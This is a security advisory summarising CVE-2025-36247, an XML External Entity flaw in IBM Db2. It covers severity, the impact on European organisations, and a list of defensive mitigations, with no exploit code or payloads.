CVE-2025-36247 is an XML External Entity (XXE) injection vulnerability classified under CWE-611, affecting IBM Db2 for Linux, UNIX, and Windows, including Db2 Connect Server, specifically versions 11.5.0 through 11.5.9 and 12.1.0 through 12.1.3. The vulnerability stems from improper restriction of XML external entity references during XML data processing within the database server. An attacker with low privileges (PR:L) can remotely exploit this vulnerability without requiring user interaction (UI:N) by submitting specially crafted XML input that triggers the XML parser to process external entities. This can lead to disclosure of sensitive information stored on the server or accessible via the server's file system, as well as potential memory resource exhaustion causing partial denial-of-service conditions. The CVSS v3.1 base score is 7.1, reflecting high severity due to the high confidentiality impact and low attack complexity. The vulnerability does not affect integrity but can impact availability to a limited extent. No public exploits have been reported yet, but the vulnerability is publicly disclosed and should be considered a significant risk. The lack of available patches at the time of disclosure necessitates immediate mitigation efforts by affected organizations. IBM Db2 is widely used in enterprise environments for critical data management, making this vulnerability particularly concerning for organizations relying on these versions for their database infrastructure.

For European organizations, the impact of CVE-2025-36247 can be substantial, especially for those in sectors such as finance, telecommunications, government, and critical infrastructure where IBM Db2 databases are prevalent. Exploitation could lead to unauthorized disclosure of sensitive data, including personally identifiable information (PII), intellectual property, or confidential business data, potentially violating GDPR and other data protection regulations. The memory exhaustion aspect could degrade database availability, disrupting business operations and causing financial and reputational damage. Given the remote exploitability and no requirement for user interaction, attackers could automate attacks at scale, increasing the risk of widespread compromise. Organizations with interconnected systems relying on Db2 may face cascading effects from data leaks or service interruptions. The vulnerability also raises compliance risks and could attract regulatory scrutiny if exploited. Overall, the threat undermines the confidentiality and availability of critical data assets within European enterprises.

1. Monitor IBM's official channels for patches addressing CVE-2025-36247 and apply them promptly once released. 2. Until patches are available, implement strict input validation and sanitization on all XML data processed by Db2 to block malicious external entity references. 3. Configure the XML parser settings within Db2 to disable or restrict external entity processing where possible. 4. Employ network-level controls such as web application firewalls (WAFs) or intrusion prevention systems (IPS) to detect and block suspicious XML payloads targeting Db2 servers. 5. Restrict database server network access to trusted sources and limit exposure to the internet. 6. Conduct regular audits and monitoring of database logs for unusual XML processing activities or memory usage spikes indicative of exploitation attempts. 7. Educate database administrators and security teams about the vulnerability and recommended defensive measures. 8. Consider deploying database activity monitoring (DAM) solutions to detect anomalous queries or data access patterns related to XXE exploitation. 9. Review and harden XML-related configurations in all applications interfacing with Db2 to minimize attack surface. 10. Prepare incident response plans specifically addressing potential XXE exploitation scenarios.